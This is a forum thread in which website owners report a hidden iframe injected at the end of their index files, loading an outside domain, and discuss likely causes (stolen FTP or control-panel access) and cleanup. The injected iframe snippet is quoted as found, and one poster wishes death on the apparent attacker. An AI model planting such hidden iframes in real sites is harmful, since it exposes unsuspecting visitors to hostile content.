Not sure how this happened, and caught it by chance.

I was loading my site and on I.E. 6 on the lower left side it usually says stuff so fast you can't read it, like the site it is opening.

Well it was running "slow" and I noticed opening site www.911traff.org.....

I'm like, what the heck is that site? Well after a quick look at in index.php file I found pasted on the end


<IFRAME name='StatPage' src='http://www.911traff.org/trf/traf.php'
width=5 height=5 style='display:none'></IFRAME>


Registered to some piece of crap in Russia! Hope he dies from radiation poisoning from Chernobyl!


He would have to have access to my cpanel or ftp user right?

Which Geeklog version was that? Are you running any other scripts on the same server?

bye, Dirk

ver 1.4.1

I installed mychat on it

the site is www.bathmiblog.com.

I went through most the code and found it in the forum index.php also.

Reminds me of this incident. In that case, it was actually an entire server that had been hacked and several Geeklog sites on that server had been modified ...

bye, Dirk

Happened to me also, all my websites on our server where infected.

It seems that it is a sort of script that a hacker runs in Cpanel, and all index.htm, index.html, index.php....etc had code added at the end of the file.

This has little to do with Geeklog, to fix this open index.php and all index.html and remove the iframe code. Upgrade to the latest Cpanel version, if you host with a hosting company, inform the hosting company that they have a problem.

Because all index.... files on all domains on that server are probably effected...

Hey Dudes,

I have seen this happen also. The hackers use the FTP account to access these index file. So make sure u don't have a crappy Password for your FTP. Better to Use a combination of caps and numbers with atleast 8 chars. As i have see they only get access to a particular FTP account but not the whole server or other users on the server. My servers uses Hsphere Control panel.

Ashleigh